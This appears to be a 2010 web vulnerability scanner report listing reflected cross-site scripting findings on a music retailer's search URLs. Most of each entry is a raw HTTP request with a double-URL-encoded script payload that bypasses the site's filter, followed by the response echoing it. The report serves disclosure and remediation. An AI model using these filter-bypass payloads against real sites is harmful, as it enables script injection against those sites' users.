This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Agallochf2346%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e17419aa4d55&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:39 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=634891aud6fh92c22q04ep9qo0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:40:39 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=202021513; expires=Sun, 09-Jan-2011 02:40:39 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=70066268; expires=Sun, 09-Jan-2011 02:40:39 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19012

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Agallochf2346</title><script>alert(1)</script>17419aa4d55</title>
...[SNIP]...

1.2. http://www.insound.com/search/query/Agalloch&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Agalloch&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2e00%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7553970dfac was submitted in the REST URL parameter 3. This input was echoed as f2e00"><script>alert(1)</script>7553970dfac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Agallochf2e00%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7553970dfac&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:30 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=c9hq9a3bn2lgop6anfuir9lu72; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:40:30 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=330084251; expires=Sun, 09-Jan-2011 02:40:30 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=499813430; expires=Sun, 09-Jan-2011 02:40:30 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18996

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Agallochf2e00"><script>alert(1)</script>7553970dfac" />
...[SNIP]...

1.3. http://www.insound.com/search/query/Art%20Department&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Art%20Department&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36a7b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9c395655252 was submitted in the REST URL parameter 3. This input was echoed as 36a7b"><script>alert(1)</script>9c395655252 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Art%20Department36a7b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9c395655252&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:37:56 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=qsiudiqo07g0he699gcpddmsp3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:37:56 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=235463841; expires=Sun, 09-Jan-2011 02:37:56 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=43683784; expires=Sun, 09-Jan-2011 02:37:56 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37076

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Art Department36a7b"><script>alert(1)</script>9c395655252" />
...[SNIP]...

1.4. http://www.insound.com/search/query/Art%20Department&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Art%20Department&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 75ca3%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e30e92eb4870 was submitted in the REST URL parameter 3. This input was echoed as 75ca3</title><script>alert(1)</script>30e92eb4870 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Art%20Department75ca3%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e30e92eb4870&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:38:02 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=ep29udjj6umuvdrkc5eigf0564; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:38:02 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=309894262; expires=Sun, 09-Jan-2011 02:38:02 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=424582467; expires=Sun, 09-Jan-2011 02:38:02 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37156

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Art Department75ca3</title><script>alert(1)</script>30e92eb4870</title>
...[SNIP]...

1.5. http://www.insound.com/search/query/Barbara%20Morgenstern&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Barbara%20Morgenstern&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 8459b%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ecb57b9a199c was submitted in the REST URL parameter 3. This input was echoed as 8459b</title><script>alert(1)</script>cb57b9a199c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Barbara%20Morgenstern8459b%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ecb57b9a199c&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:23 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=1sddod10ggfk6hpomapg746nb6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:40:23 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=242487712; expires=Sun, 09-Jan-2011 02:40:23 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=536451074; expires=Sun, 09-Jan-2011 02:40:23 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 35137

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Barbara Morgenstern8459b</title><script>alert(1)</script>cb57b9a199c</title>
...[SNIP]...

1.6. http://www.insound.com/search/query/Barbara%20Morgenstern&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Barbara%20Morgenstern&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 979d6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0f8bcdf69e7 was submitted in the REST URL parameter 3. This input was echoed as 979d6"><script>alert(1)</script>0f8bcdf69e7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Barbara%20Morgenstern979d6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0f8bcdf69e7&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:16 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=tuoge82njlg5gmilbu72gjoas0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:40:16 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=360663585; expires=Sun, 09-Jan-2011 02:40:16 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=306659547; expires=Sun, 09-Jan-2011 02:40:16 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 35121

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Barbara Morgenstern979d6"><script>alert(1)</script>0f8bcdf69e7" />
...[SNIP]...

1.7. http://www.insound.com/search/query/Bjørn%20Torske&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Bj..rn%20Torske&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload eba07%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6222e7940c6 was submitted in the REST URL parameter 3. This input was echoed as eba07</title><script>alert(1)</script>6222e7940c6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Bjeba07%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6222e7940c6..rn%20Torske&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:54 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=b37vrlaoivpk40a9bi51n3it16; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:40:54 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=461067654; expires=Sun, 09-Jan-2011 02:40:54 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=337211473; expires=Sun, 09-Jan-2011 02:40:54 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22059

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Bjeba07</title><script>alert(1)</script>6222e7940c6..rn Torske</title>
...[SNIP]...

1.8. http://www.insound.com/search/query/Bjørn%20Torske&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Bj..rn%20Torske&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd41e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8bddc1aa843 was submitted in the REST URL parameter 3. This input was echoed as dd41e"><script>alert(1)</script>8bddc1aa843 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Bjdd41e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8bddc1aa843..rn%20Torske&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:47 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=gpf0hm7u2bnf7p2n07f61m92j3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:40:47 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=378021985; expires=Sun, 09-Jan-2011 02:40:47 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=488756586; expires=Sun, 09-Jan-2011 02:40:47 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22043

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Bjdd41e"><script>alert(1)</script>8bddc1aa843..rn Torske" />
...[SNIP]...

1.9. http://www.insound.com/search/query/Blank%20Dogs&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Blank%20Dogs&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e578%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253efb16a61fd2 was submitted in the REST URL parameter 3. This input was echoed as 5e578"><script>alert(1)</script>fb16a61fd2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Blank%20Dogs5e578%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253efb16a61fd2&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:17 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=i0ff4qi9u1rc5tsi33tvtlhir2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:40:17 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=126106492; expires=Sun, 09-Jan-2011 02:40:17 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=98122353; expires=Sun, 09-Jan-2011 02:40:17 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 36954

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Blank Dogs5e578"><script>alert(1)</script>fb16a61fd2" />
...[SNIP]...

1.10. http://www.insound.com/search/query/Blank%20Dogs&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Blank%20Dogs&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 5e9f8%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e34d1968c2ef was submitted in the REST URL parameter 3. This input was echoed as 5e9f8</title><script>alert(1)</script>34d1968c2ef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Blank%20Dogs5e9f8%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e34d1968c2ef&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:23 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=e9u56t5aued21hsdl9furi28i0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:40:23 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=32536722; expires=Sun, 09-Jan-2011 02:40:23 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=76660747; expires=Sun, 09-Jan-2011 02:40:23 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37018

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Blank Dogs5e9f8</title><script>alert(1)</script>34d1968c2ef</title>
...[SNIP]...

1.11. http://www.insound.com/search/query/Blonde%20Redhead&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Blonde%20Redhead&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 49bba%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7cc6fbc821c was submitted in the REST URL parameter 3. This input was echoed as 49bba</title><script>alert(1)</script>7cc6fbc821c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Blonde%20Redhead49bba%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7cc6fbc821c&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:41:11 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=2995ss7bvdfrgh08g1heb16pm2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:41:11 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=414114324; expires=Sun, 09-Jan-2011 02:41:11 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=517843897; expires=Sun, 09-Jan-2011 02:41:11 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37647

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Blonde Redhead49bba</title><script>alert(1)</script>7cc6fbc821c</title>
...[SNIP]...

1.12. http://www.insound.com/search/query/Blonde%20Redhead&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Blonde%20Redhead&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 760b7%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e48f4f488cc7 was submitted in the REST URL parameter 3. This input was echoed as 760b7"><script>alert(1)</script>48f4f488cc7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Blonde%20Redhead760b7%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e48f4f488cc7&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:41:05 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=0n0snfl9t8rifi6a1isdr555t6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:41:05 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=130844079; expires=Sun, 09-Jan-2011 02:41:05 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=367202106; expires=Sun, 09-Jan-2011 02:41:05 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37591

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Blonde Redhead760b7"><script>alert(1)</script>48f4f488cc7" />
...[SNIP]...

